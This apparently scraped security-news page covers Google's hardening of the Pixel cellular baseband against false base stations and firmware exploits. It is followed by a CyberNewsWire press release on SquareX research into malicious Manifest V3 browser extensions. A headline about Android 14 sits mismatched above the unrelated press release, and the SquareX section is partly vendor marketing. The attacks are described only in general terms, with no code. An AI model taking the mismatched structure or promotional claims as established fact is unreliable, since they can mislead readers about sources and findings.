Google has revealed the various security guardrails that have been incorporated into its latest Pixel devices to counter the rising threat posed by baseband security attacks.

The cellular baseband (i.e., modem) refers to a processor on the device that's responsible for handling all connectivity, such as LTE, 4G, and 5G, with a mobile phone cell tower or base station over a radio interface.

"This function inherently involves processing external inputs, which may originate from untrusted sources," Sherk Chung and Stephan Chen from the Pixel team, and Roger Piqueras Jover and Ivan Lozano from the company's Android team said in a blog post shared with The Hacker News.

"For instance, malicious actors can employ false base stations to inject fabricated or manipulated network packets. In certain protocols like IMS (IP Multimedia Subsystem), this can be executed remotely from any global location using an IMS client."

What's more, the firmware powering the cellular baseband could also be vulnerable to bugs and errors that, if successfully exploited, could undermine the security of the device, particularly in scenarios where they lead to remote code execution.

In a Black Hat USA presentation last August, a team of Google security engineers described the modem as both a "fundamental" and "critical" smartphone component with access to sensitive data and one that's remote accessible with various radio technologies.

Threats to the baseband are not theoretical. In October 2023, research published by Amnesty International found that the Intellexa alliance behind Predator had developed a tool called Triton to exploit vulnerabilities in Exynos baseband software used in Samsung devices to deliver the mercenary spyware as part of highly targeted attacks.

The attack involves conducting a covert downgrade attack that forces the targeted device to connect to the legacy 2G network by means of a cell-site simulator, following which a 2G base station transceiver (BTS) is used to distribute the nefarious payload.

Google has since introduced a new security feature in Android 14 that allows IT administrators to turn off support for 2G cellular networks in their managed devices. It has also highlighted the role played by Clang sanitizers (IntSan and BoundSan) in hardening the security of the cellular baseband in Android.

Then earlier this year, the tech giant revealed it's working with ecosystem partners to add new ways of alerting Android users if their cellular network connection is unencrypted and if a bogus cellular base station or surveillance tool is recording their location using a device identifier.

The company has also outlined the steps it's taking to combat threat actors' use of cell-site simulators like Stingrays to inject SMS messages directly into Android phones, otherwise called SMS Blaster fraud.

"This method to inject messages entirely bypasses the carrier network, thus bypassing all the sophisticated network-based anti-spam and anti-fraud filters," Google noted in August. "SMS Blasters expose a fake LTE or 5G network which executes a single function: downgrading the user's connection to a legacy 2G protocol."

Some of the other defenses the company has added to its new Pixel 9 lineup include stack canaries, control-flow integrity (CFI), and auto-initialization of stack variables to zero to avoid leakage of sensitive data or act as an avenue to gain code execution.

"Stack canaries are like tripwires set up to ensure code executes in the expected order," it said. "If a hacker tries to exploit a vulnerability in the stack to change the flow of execution without being mindful of the canary, the canary "trips," alerting the system to a potential attack."

"Similar to stack canaries, CFI makes sure code execution is constrained along a limited number of paths. If an attacker tries to deviate from the allowed set of execution paths, CFI causes the modem to restart rather than take the unallowed execution path.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Android 14 Adds New Security Features to Block 2G Exploits and Baseband Attacks

Singapore, Singapore, 3rd October 2024, CyberNewsWire

**Singapore, Singapore, October 3rd, 2024, CyberNewsWire**

At DEF CON 32, the SquareX research team delivered a hard-hitting presentation titled Sneaky Extensions: The MV3 Escape Artists where they shared their findings on how malicious browser extensions are bypassing Google’s latest standard for building chrome extensions: Manifest V3 (MV3)’s security features, putting millions of users and businesses at risk.

SquareX’s research team publicly demonstrated rogue extensions built on MV3. The key findings include:

*   Extensions can steal live video streams, such as those from Google Meet and Zoom Web, without requiring special permissions.
*   The rogue extensions can act on a user’s behalf to add collaborators to private GitHub repositories.
*   The extensions are capable of hooking into login events to redirect users to a page disguised as a password manager login.
*   Extensions built on MV3 can steal site cookies, browsing history, bookmarks, and download history with ease, like their MV2 counterparts.
*   The rogue extensions can add pop-ups to the active webpage, such as fake software update prompts, tricking users into downloading malware.

Browser extensions have long been a target for malicious actors — a Stanford University report estimates that 280 million malicious Chrome extensions were installed in recent years. Google has struggled to address this issue, often relying on independent researchers to identify malicious extensions. In some cases, Google has had to manually remove them, such as the 32 extensions taken down in June last year. By the time they were removed, these extensions had already been installed 75 million times.

Most of these issues arose because the Chrome extension standard, Manifest Version 2 (MV2), was riddled with loopholes that granted extensions excessive permissions, and allowed scripts to be injected on the fly, often without users’ knowledge. This allowed malicious actors to easily exploit these vulnerabilities to steal data, inject malware, and access sensitive information. MV3 was introduced to address these problems by tightening security, limiting permissions, and requiring extensions to declare their scripts beforehand. 

However, SquareX’s research shows that MV3 falls short in many critical areas, demonstrating how attackers are still able to exploit minimal permissions to carry out malicious activity. Both individual users and enterprises are exposed, even under the newer MV3 framework.

Today’s security solutions, such as endpoint security, SASE/SSE, and Secure Web Gateways (SWG), lack visibility into installed browser extensions. There is currently no mature tool or platform capable of dynamically instrumenting these extensions, leaving enterprises without the ability to accurately assess whether an extension is safe or malicious. 

SquareX is committed to the highest level of cybersecurity protection for enterprises and has built key innovative features to solve this problem, which include;

*   Fine grained policies to decide which extensions to allow / block and parameters include extension permissions, creation date, last update, reviews, ratings, user count, author attributes etc
*   SquareX blocks network requests sent by extensions at run time – based on policies, heuristics and machine learning insights
*   SquareX is also experimenting with dynamic analysis of Chrome Extensions using a modified Chromium browser in its cloud server

These are part of SquareX’s Browser Detection and Response solution which is being deployed at medium-large enterprises and is effectively blocking these attacks.

> **Vivek Ramachandran****, Founder & CEO of** **SquareX**, warned about the mounting risks: “Browser extensions are a blind spot for EDR/XDR and SWGs have no way to infer their presence. This has made browser extensions a very effective and potent technique to silently be installed and monitor enterprise users, and attackers are leveraging them to monitor communication over web calls, act on the victim’s behalf to give permissions to external parties, steal cookies and other site data and so on.” “Our research proves that without dynamic analysis and the ability for enterprises to apply stringent policies, it will not be possible to identify and block these attacks. Google MV3, though well intended, is still far away from enforcing security at both a design and implementation phase,” said Vivek Ramachandran.

**About SquareX**

SquareX helps organizations detect, mitigate and threat-hunt client-side web attacks happening against their users in real time.

SquareX’s industry-first Browser Detection and Response (BDR) solution, takes an attack-focused approach to browser security, ensuring enterprise users are protected against advanced threats like malicious QR Codes, Browser-in-the-Browser phishing, macro-based malware, malicious extensions and other web attacks encompassing malicious files, websites, scripts, and compromised networks.

With SquareX, enterprises can also provide contractors and remote workers with secure access to internal applications, enterprise SaaS, and convert the browsers on BYOD / unmanaged devices into trusted browsing sessions.

**Contact**

**Head of PR**  
**Junice Liew**  
**SquareX**  
**\[email protected\]**

Tag

#google